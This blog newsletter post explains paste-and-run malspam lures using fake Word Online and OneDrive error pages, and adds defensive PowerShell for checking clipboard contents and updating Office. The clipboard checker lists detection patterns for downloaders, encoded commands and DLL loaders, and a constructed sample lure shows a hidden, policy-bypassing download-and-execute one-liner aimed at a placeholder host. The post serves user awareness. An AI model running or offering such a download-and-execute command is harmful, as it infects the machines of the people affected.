Newsletter 06/20/2024 | If you find this article of value, please help keep the blog going by making a contribution at GoFundMe or Paypal |
More Old Wine In a New Bottle, Part 2:
In the same Proofpoint blog post cited in the previous article, dated June 17, 2024, a variation of the technique used to trick users into running PowerShell commands is detailed. Here, malspam is the attack vector. Just as malware is short for "malicious software," malspam is current technospeak for "malicious spam." Uncle Sam, through HHS, offers a 25-page white paper on malspam. To lure users into infecting their own computers, a file attachment that resembles a Word document is attached to an email. Once opened, the fake page displays an error message saying that the "Word Online extension" is not installed. Yet, as per Microsoft Copilot: There doesn't appear to be a standalone Word Online extension. Microsoft Word is part of the Microsoft 365 suite, and its online version is integrated within this suite. Moreover, Microsoft states that the Office 365 extension was discontinued January 15th, 2024. Microsoft offers guidance on how to remove the extension.
When clicked upon, the malspam attachment documented by Proofpoint displays what resembles a dimmed Word document. As shown above, in the middle of the screen is a dialog box stating that the nonexistent Word Online extension is not installed. To proceed to read the fake Word doc, the user is offered two buttons, and both lead to the same place. The "How to fix it" button copies the malware code to the clipboard and instructs the user to paste it into Windows PowerShell. The "Auto-fix" button opens PowerShell directly, which then downloads and runs a DLL file that infects the computer. Either way, it is the user, not an exploit, who launches the payload.
As recently as May 24, 2024, Proofpoint documented that a similar malspam campaign is afoot, but this time with a spoofed OneDrive file. The HTML attachment claims that there is a document hosted on OneDrive. The page then claims that OneDrive cannot load because of a damaged DNS cache. Although the fake error message is different, the attack vector is the same. As Proofpoint detailed the process: If the "How to fix" button was clicked, it copied a PowerShell script to the clipboard and provided instructions to the user on how to run it. This attack chain ultimately led to the installation of DarkGate malware. To be clear, if OneDrive fails, the cause of the failure is most likely a bad network connection to the Internet and not OneDrive itself. It should be noted that OneDrive is part of Windows. As such, the application needs little maintenance. Nonetheless, according to Microsoft, the most common reason for OneDrive to fail is that the user's Microsoft (Office) 365 subscription has expired. Another reason OneDrive may fail is a DNS error that requires the DNS cache to be flushed. The steps to flush the DNS cache, taken from the same Microsoft page cited above, are outlined and shown below. There is no need to launch PowerShell, and certainly no need to paste anything a web page hands you.
1. To flush the local system's DNS cache:
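The habit that defeats both lures described above is to look at what the "How to fix" button actually put on the clipboard before pasting it anywhere. The following is an added example, written for this page and not code from Proofpoint, Microsoft, or this blog's author. The indicator patterns are this example's own assumptions about what such one-liners tend to contain (a downloader, a hidden window, a policy bypass, an encoded command, or a DLL loader), not a published list, and the sample clipboard text is constructed and points at a reserved, non-routable host.

```powershell
# Added example: inspect clipboard text for the traits of a paste-and-run lure.
# Indicator list is an assumption of this example, not a vendor-published set.
function Test-ClipboardForLure {
    [CmdletBinding()]
    param(
        # Text to inspect; defaults to whatever is on the clipboard right now.
        [string]$Text = (Get-Clipboard -Raw)
    )

    $indicators = @(
        'Invoke-Expression', '\biex\b',                 # execute a string as code
        'DownloadString', 'DownloadFile', 'Net\.WebClient',
        'Invoke-WebRequest', '\biwr\b', '\bcurl\b', 'Start-BitsTransfer',
        '-EncodedCommand', '\s-e(nc|c)?\s',             # base64-hidden command
        'FromBase64String',
        '-WindowStyle\s+Hidden', '-w\s+hidden',         # keep the console out of sight
        '-ExecutionPolicy\s+Bypass', '-ep\s+bypass',
        'rundll32', 'regsvr32', 'mshta', '\.dll\b'      # load a downloaded DLL
    )

    # -match is case-insensitive by default, which suits obfuscated casing.
    $hits = foreach ($pattern in $indicators) {
        if ($Text -match $pattern) { $pattern }
    }

    $preview = if ($Text.Length -gt 120) { $Text.Substring(0, 120) + '...' } else { $Text }

    [pscustomobject]@{
        Length     = $Text.Length
        Suspicious = [bool]$hits
        Indicators = @($hits)
        Preview    = $preview
    }
}

# Constructed sample in the shape of a "How to fix it" clipboard payload.
# example.invalid is a reserved name and resolves nowhere; the string is inert.
$sample = 'powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString(''https://example.invalid/update.ps1'')"'
Test-ClipboardForLure -Text $sample     # Suspicious : True, several indicators listed

# Check the live clipboard after clicking any "fix it" button on a web page.
Test-ClipboardForLure

# If OneDrive really does report a DNS problem, this is the whole legitimate fix.
# The equivalent from a Command Prompt is:  ipconfig /flushdns
Clear-DnsClientCache
```

Run the function from a PowerShell window you opened yourself, not one a web page opened for you. A legitimate fix from Microsoft is a single short command such as the cache flush at the end of the block; anything that fetches code from the Internet and hides its own window is the lure, whatever the dialog box says.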
Most users of Word, Excel, Outlook, and/or PowerPoint have their own subscription to the Office suite of applications through a Microsoft 365 subscription. As with Google Chrome on the preceding page, security-aware consumers should frequently check their Office installation for updates. As I do with Chrome, I suggest users check for Office updates on a daily basis. The short tutorial below is taken from an earlier Dispatch, dated March 04, 2023. It is, however, worth repeating. Personal information has been edited out, or "CENSORED." Lol.
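For readers who would rather script the daily check than click through File > Account > Update Options, the following is an added example and is not part of the original Dispatch tutorial. It assumes a Click-to-Run (Microsoft 365) installation of Office; the registry key and the path to the Click-to-Run client are the usual locations for such installs and should be confirmed on your own machine before relying on them.

```powershell
# Added example: read the installed Office build and kick off the same update
# check the Office apps run from "Update Now". Assumes a Click-to-Run install;
# the key and client path below are assumptions to verify on your machine.
function Get-OfficeClickToRunVersion {
    $key = 'HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration'
    if (-not (Test-Path $key)) { return $null }    # not a Click-to-Run install
    $cfg = Get-ItemProperty -Path $key
    [pscustomobject]@{
        Version        = $cfg.VersionToReport      # build Office reports under Account
        UpdateChannel  = $cfg.UpdateChannel        # channel URL the install pulls from
        UpdatesEnabled = $cfg.UpdatesEnabled       # 'False' here means updates were disabled
    }
}

function Start-OfficeUpdateCheck {
    $client = Join-Path ${env:ProgramFiles} 'Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe'
    if (-not (Test-Path $client)) { throw "Click-to-Run client not found at $client" }
    # Triggers the user-initiated update flow; Office shows its own progress dialog.
    & $client /update user
}

$before = Get-OfficeClickToRunVersion
if ($null -eq $before) { Write-Warning 'No Click-to-Run Office found; use Windows Update or your installer instead.' }
else {
    $before
    if ($before.UpdatesEnabled -eq 'False') { Write-Warning 'Office updates are disabled on this machine.' }
    Start-OfficeUpdateCheck
}
```

The version string printed before the update is the one to compare against the current build listed on Microsoft's release notes page; if updates show as disabled, fix that first, since no amount of clicking "Update Now" will help.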
The more users take command of, and thus responsibility for, keeping their software up to date, the less likely they are to be duped by the shenanigans discussed in this post and the previous one. The important takeaway, however, is to follow the advice of Uncle Sam below.
¯\_(ツ)_/¯ Gerald Reiff